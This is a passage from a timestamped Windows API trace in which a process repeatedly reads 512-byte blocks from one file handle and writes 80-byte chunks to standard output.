(hFile=0x4c) returned 0x1 [0096.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.315] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.315] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.315] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.315] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.315] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.315] GetFileType (hFile=0x4c) returned 0x1 [0096.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.315] GetFileType (hFile=0x4c) returned 0x1 [0096.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.315] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.316] GetFileType (hFile=0x4c) returned 0x1 [0096.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.316] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.316] GetFileType (hFile=0x4c) returned 0x1 [0096.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.316] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.316] GetFileType (hFile=0x4c) returned 0x1 [0096.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.316] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.316] GetFileType (hFile=0x4c) returned 0x1 [0096.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.316] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.316] GetFileType (hFile=0x4c) returned 0x1 [0096.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.316] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.316] GetFileType (hFile=0x4c) returned 0x1 [0096.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.316] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.316] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.316] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.316] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.316] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.316] GetFileType (hFile=0x4c) returned 0x1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] GetFileType (hFile=0x4c) returned 0x1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] GetFileType (hFile=0x4c) returned 0x1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] GetFileType (hFile=0x4c) returned 0x1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] GetFileType (hFile=0x4c) returned 0x1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] GetFileType (hFile=0x4c) returned 0x1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] GetFileType (hFile=0x4c) returned 0x1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] GetFileType (hFile=0x4c) returned 0x1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.317] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.317] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.317] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.317] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] GetFileType (hFile=0x4c) returned 0x1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] GetFileType (hFile=0x4c) returned 0x1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] GetFileType (hFile=0x4c) returned 0x1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] GetFileType (hFile=0x4c) returned 0x1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] GetFileType (hFile=0x4c) returned 0x1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] GetFileType (hFile=0x4c) returned 0x1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] GetFileType (hFile=0x4c) returned 0x1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] GetFileType (hFile=0x4c) returned 0x1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.318] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.318] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.318] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.318] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] GetFileType (hFile=0x4c) returned 0x1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] GetFileType (hFile=0x4c) returned 0x1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] GetFileType (hFile=0x4c) returned 0x1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] GetFileType (hFile=0x4c) returned 0x1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] GetFileType (hFile=0x4c) returned 0x1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] GetFileType (hFile=0x4c) returned 0x1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] GetFileType (hFile=0x4c) returned 0x1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] GetFileType (hFile=0x4c) returned 0x1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.319] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.319] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.319] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.319] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] GetFileType (hFile=0x4c) returned 0x1 [0096.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] GetFileType (hFile=0x4c) returned 0x1 [0096.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] GetFileType (hFile=0x4c) returned 0x1 [0096.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] GetFileType (hFile=0x4c) returned 0x1 [0096.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] GetFileType (hFile=0x4c) returned 0x1 [0096.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] GetFileType (hFile=0x4c) returned 0x1 [0096.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] GetFileType (hFile=0x4c) returned 0x1 [0096.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] GetFileType (hFile=0x4c) returned 0x1 [0096.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.321] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.321] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.321] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.321] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.321] GetFileType (hFile=0x4c) returned 0x1 [0096.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.321] GetFileType (hFile=0x4c) returned 0x1 [0096.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.321] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.321] GetFileType (hFile=0x4c) returned 0x1 [0096.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.321] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.321] GetFileType (hFile=0x4c) returned 0x1 [0096.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.321] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.321] GetFileType (hFile=0x4c) returned 0x1 [0096.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.321] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.321] GetFileType (hFile=0x4c) returned 0x1 [0096.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.322] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.322] GetFileType (hFile=0x4c) returned 0x1 [0096.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.322] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.322] GetFileType (hFile=0x4c) returned 0x1 [0096.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.322] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.322] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.322] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.322] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.322] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.322] GetFileType (hFile=0x4c) returned 0x1 [0096.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.322] GetFileType (hFile=0x4c) returned 0x1 [0096.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.322] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.322] GetFileType (hFile=0x4c) returned 0x1 [0096.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.322] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.323] GetFileType (hFile=0x4c) returned 0x1 [0096.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.323] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.323] GetFileType (hFile=0x4c) returned 0x1 [0096.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.323] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.323] GetFileType (hFile=0x4c) returned 0x1 [0096.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.323] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.323] GetFileType (hFile=0x4c) returned 0x1 [0096.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.323] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.323] GetFileType (hFile=0x4c) returned 0x1 [0096.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.323] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.323] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.323] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.323] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.323] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.323] GetFileType (hFile=0x4c) returned 0x1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] GetFileType (hFile=0x4c) returned 0x1 [0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.324] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, 